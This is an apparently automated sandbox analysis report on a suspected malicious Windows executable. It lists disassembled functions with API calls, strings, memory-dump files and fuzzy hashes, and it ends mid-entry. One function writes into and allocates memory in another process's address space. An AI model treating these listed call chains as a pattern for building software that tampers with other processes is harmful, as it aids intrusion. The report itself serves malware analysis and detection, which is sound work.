                                    • Part of subcall function 003829C8: GetLastError.KERNEL32(00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000,00000000), ref: 003829F0
                                  • _free.LIBCMT ref: 0038D764
                                  • _free.LIBCMT ref: 0038D776
                                  • _free.LIBCMT ref: 0038D788
                                  • _free.LIBCMT ref: 0038D79A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: e2c4baf70d65e29c2797cc6fa3ebf3b380946e52caa6f0e80e5f7c74cb3ab1c7
                                  • Instruction ID: a605a44a407b209b943e8cba88473fd7f7a0a9249dc3e7ff615457e243d8c260
                                  • Opcode Fuzzy Hash: e2c4baf70d65e29c2797cc6fa3ebf3b380946e52caa6f0e80e5f7c74cb3ab1c7
                                  • Instruction Fuzzy Hash: 4DF0FF72544304AB8622FF68F9C5C5777EDBB457117A64895F048DB541C724FC808768
                                  Function 003822A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 003822BE
                                    • Part of subcall function 003829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000), ref: 003829DE
                                    • Part of subcall function 003829C8: GetLastError.KERNEL32(00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000,00000000), ref: 003829F0
                                  • _free.LIBCMT ref: 003822D0
                                  • _free.LIBCMT ref: 003822E3
                                  • _free.LIBCMT ref: 003822F4
                                  • _free.LIBCMT ref: 00382305
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: a9436457c08396bbc463342da53a089134e0dabd4c972962da174d97bb9deddd
                                  • Instruction ID: a27d10f5a389cd13e1e7a52c461af498f9d407149a9ff22023b988f7f012e051
                                  • Opcode Fuzzy Hash: a9436457c08396bbc463342da53a089134e0dabd4c972962da174d97bb9deddd
                                  • Instruction Fuzzy Hash: 11F03070680210CBC623BF54BC8184A3BA4B72975178245A6F410D6272C7751463DBAC
                                  Function 003695C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  • EndPath.GDI32(?), ref: 003695D4
                                  • StrokeAndFillPath.GDI32(?,?,003A71F7,00000000,?,?,?), ref: 003695F0
                                  • SelectObject.GDI32(?,00000000), ref: 00369603
                                  • DeleteObject.GDI32 ref: 00369616
                                  • StrokePath.GDI32(?), ref: 00369631
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                  • String ID:
                                  • API String ID: 2625713937-0
                                  • Opcode ID: 74a494362f35b6e95c379d5c3a0890209f7730db015aee45ecd836e69c18a711
                                  • Instruction ID: 7c3f4e7f3b547fefc52abc50ff0be60cbec6255020c4be0d5c5974f83627952e
                                  • Opcode Fuzzy Hash: 74a494362f35b6e95c379d5c3a0890209f7730db015aee45ecd836e69c18a711
                                  • Instruction Fuzzy Hash: EEF01970105388EBDB375F65ED58B683B69AB11332F448325F525590F4C7348993DF28
                                  Function 00380F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: __freea$_free
                                  • String ID: a/p$am/pm
                                  • API String ID: 3432400110-3206640213
                                  • Opcode ID: ada3562ea3019de5711634cd7064bfc1072b14b86bf991f2cc4a5c037e7d9355
                                  • Instruction ID: b312af9d0feef0a32a6ccdf4de7ed30c4482ec33264b4165ef9c7a374efd5fb0
                                  • Opcode Fuzzy Hash: ada3562ea3019de5711634cd7064bfc1072b14b86bf991f2cc4a5c037e7d9355
                                  • Instruction Fuzzy Hash: 91D10475900306CACB2BBF68C845BFAB7BCEF06700F2545D9E9019BA51D3B59D82CB51
                                  Function 003D61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00370242: EnterCriticalSection.KERNEL32(0042070C,00421884,?,?,0036198B,00422518,?,?,?,003512F9,00000000), ref: 0037024D
                                    • Part of subcall function 00370242: LeaveCriticalSection.KERNEL32(0042070C,?,0036198B,00422518,?,?,?,003512F9,00000000), ref: 0037028A
                                    • Part of subcall function 003700A3: __onexit.LIBCMT ref: 003700A9
                                  • __Init_thread_footer.LIBCMT ref: 003D6238
                                    • Part of subcall function 003701F8: EnterCriticalSection.KERNEL32(0042070C,?,?,00368747,00422514), ref: 00370202
                                    • Part of subcall function 003701F8: LeaveCriticalSection.KERNEL32(0042070C,?,00368747,00422514), ref: 00370235
                                    • Part of subcall function 003C359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003C35E4
                                    • Part of subcall function 003C359C: LoadStringW.USER32(00422390,?,00000FFF,?), ref: 003C360A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                  • String ID: x#B$x#B$x#B
                                  • API String ID: 1072379062-688998661
                                  • Opcode ID: 60b5c8bee3605b18fbf12ed47f4f811130c1d11270f30e6eb5cec4d9c3c63b50
                                  • Instruction ID: 91caec9f2a1105e67d6db5eed175be86f668defa952be25eb737b0f4496e8cf2
                                  • Opcode Fuzzy Hash: 60b5c8bee3605b18fbf12ed47f4f811130c1d11270f30e6eb5cec4d9c3c63b50
                                  • Instruction Fuzzy Hash: 96C19D72A00105AFCB16DF58E892EBEB7B9EF49300F11806AF9159B391DB74ED45CB90
                                  Function 00388A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00388B6E
                                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00388B7A
                                  • __dosmaperr.LIBCMT ref: 00388B81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                  • String ID: .7
                                  • API String ID: 2434981716-287046593
                                  • Opcode ID: 33bc413c540eba5d0f8240652cfeecf0eebb2a2e9fd397b1218b8f77672349df
                                  • Instruction ID: 44eeaabede89ef3346d7f62a11cedc0589afc4e5e92425315b1a1bf068af8f79
                                  • Opcode Fuzzy Hash: 33bc413c540eba5d0f8240652cfeecf0eebb2a2e9fd397b1218b8f77672349df
                                  • Instruction Fuzzy Hash: 73415C70604245AFDB37AF28CC80ABD7FE6DF85304F6985E9F8858B542DE358D029794
                                  Function 003B2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003BB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003B21D0,?,?,00000034,00000800,?,00000034), ref: 003BB42D
                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003B2760
                                    • Part of subcall function 003BB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003B21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 003BB3F8
                                    • Part of subcall function 003BB32A: GetWindowThreadProcessId.USER32(?,?), ref: 003BB355
                                    • Part of subcall function 003BB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003B2194,00000034,?,?,00001004,00000000,00000000), ref: 003BB365
                                    • Part of subcall function 003BB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003B2194,00000034,?,?,00001004,00000000,00000000), ref: 003BB37B
                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003B27CD
                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003B281A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                  • String ID: @
                                  • API String ID: 4150878124-2766056989
                                  • Opcode ID: fbd551ea1dcb2663614fd4bde60490ce1229615135efc75020ade3c630761f15
                                  • Instruction ID: 7aaeff49bfe1a1b63f3c292ca40725c2214685ffffc61fcb896b47cf08eb8fa5
                                  • Opcode Fuzzy Hash: fbd551ea1dcb2663614fd4bde60490ce1229615135efc75020ade3c630761f15
                                  • Instruction Fuzzy Hash: 56413C76900218AFDB11DFA4CD86EEEBBB8EF09704F004195FA55BB191DB706E45CBA0
                                  Function 0038172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4QihT6CwD8.exe,00000104), ref: 00381769
                                  • _free.LIBCMT ref: 00381834
                                  • _free.LIBCMT ref: 0038183E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _free$FileModuleName
                                  • String ID: C:\Users\user\Desktop\4QihT6CwD8.exe
                                  • API String ID: 2506810119-2522366922
                                  • Opcode ID: e16af406554ed7feb060b8de9f83e7bcc91c5383bbe8a8b4338ed7e976c34460
                                  • Instruction ID: f3ae9d6c8f0301aa8c2be72b3d69d80a238a648a4f4f5dfc5a5155f5b8430724
                                  • Opcode Fuzzy Hash: e16af406554ed7feb060b8de9f83e7bcc91c5383bbe8a8b4338ed7e976c34460
                                  • Instruction Fuzzy Hash: 1C318275A00318EFDB22EB99D881D9EBBFCEB95310F5141EAF4049B211D7B04E42CBA0
                                  Function 003BC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003BC306
                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 003BC34C
                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00421990,01196878), ref: 003BC395
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$InfoItem
                                  • String ID: 0
                                  • API String ID: 135850232-4108050209
                                  • Opcode ID: 7ec7d881406dc2aa258dfc6c6c18641ef7d5da9d778a28c3392b2e3cc317f5d2
                                  • Instruction ID: 870ae10fff582b6d51647c3f1720e2973001f841769031ff22af1e4c4d697c25
                                  • Opcode Fuzzy Hash: 7ec7d881406dc2aa258dfc6c6c18641ef7d5da9d778a28c3392b2e3cc317f5d2
                                  • Instruction Fuzzy Hash: B541C4352143019FD732DF25D884F9ABBE8AF85314F04961EFAA99B2D1C774E804CB52
                                  Function 003E4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003ECC08,00000000,?,?,?,?), ref: 003E44AA
                                  • GetWindowLongW.USER32 ref: 003E44C7
                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003E44D7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$Long
                                  • String ID: SysTreeView32
                                  • API String ID: 847901565-1698111956
                                  • Opcode ID: c8bf82da0fd3af61f590ccac55e9bf9994efc9200fbf9b5f0757082896bb3552
                                  • Instruction ID: 51a638a6e07d130b3e01e19197f6ef809bfded24b0107504301b04855ad0da9c
                                  • Opcode Fuzzy Hash: c8bf82da0fd3af61f590ccac55e9bf9994efc9200fbf9b5f0757082896bb3552
                                  • Instruction Fuzzy Hash: E731CB31210295AFDB228F3ADC85BEB7BA9EB09334F214325F979921E0D770EC519B50
                                  Function 003B6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SysReAllocString.OLEAUT32(?,?), ref: 003B6EED
                                  • VariantCopyInd.OLEAUT32(?,?), ref: 003B6F08
                                  • VariantClear.OLEAUT32(?), ref: 003B6F12
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Variant$AllocClearCopyString
                                  • String ID: *j;
                                  • API String ID: 2173805711-3833753645
                                  • Opcode ID: 7930f4276a795863f3dc2c010c2c62708dcc0c5214741476a2177396d883a5d2
                                  • Instruction ID: 0e02aa226ff329f33a4daf7012a853b75e7a9db1d2831534d136c6f5f7a03cff
                                  • Opcode Fuzzy Hash: 7930f4276a795863f3dc2c010c2c62708dcc0c5214741476a2177396d883a5d2
                                  • Instruction Fuzzy Hash: 3E317071604245DBCB07AFA4E8929BE7779EF45309B100898FA024F6B2D7389926DBD0
                                  Function 003D304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003D335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,003D3077,?,?), ref: 003D3378
                                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003D307A
                                  • _wcslen.LIBCMT ref: 003D309B
                                  • htons.WSOCK32(00000000,?,?,00000000), ref: 003D3106
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                  • String ID: 255.255.255.255
                                  • API String ID: 946324512-2422070025
                                  • Opcode ID: 60b69b82c6dd13eecfa77cf82e2ea04981e5a0efd212e55a0870c22582b076b9
                                  • Instruction ID: 500844de3f49c3282ffe90f991a076bb9636e1eb12f05bd9a6d52e8e9760a724
                                  • Opcode Fuzzy Hash: 60b69b82c6dd13eecfa77cf82e2ea04981e5a0efd212e55a0870c22582b076b9
                                  • Instruction Fuzzy Hash: 3431F53A204202DFC722DF28D585EA977E0EF14318F25805AE9168F792C731EF45C762
                                  Function 003E4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003E4705
                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003E4713
                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003E471A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$DestroyWindow
                                  • String ID: msctls_updown32
                                  • API String ID: 4014797782-2298589950
                                  • Opcode ID: 42186bfee766b35d5aed61006448b3abf51c289a25071bc5a28b764455885766
                                  • Instruction ID: a00643a0d0db3c30ecd59f95ad40e05b7a88ab460db0c23bd77b58b9050d46e5
                                  • Opcode Fuzzy Hash: 42186bfee766b35d5aed61006448b3abf51c289a25071bc5a28b764455885766
                                  • Instruction Fuzzy Hash: 972162B5600258AFDB12DF65DCC1DA737ADEB5A354B450159FA109B3A1CB30EC52CAA0
                                  Function 003B95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
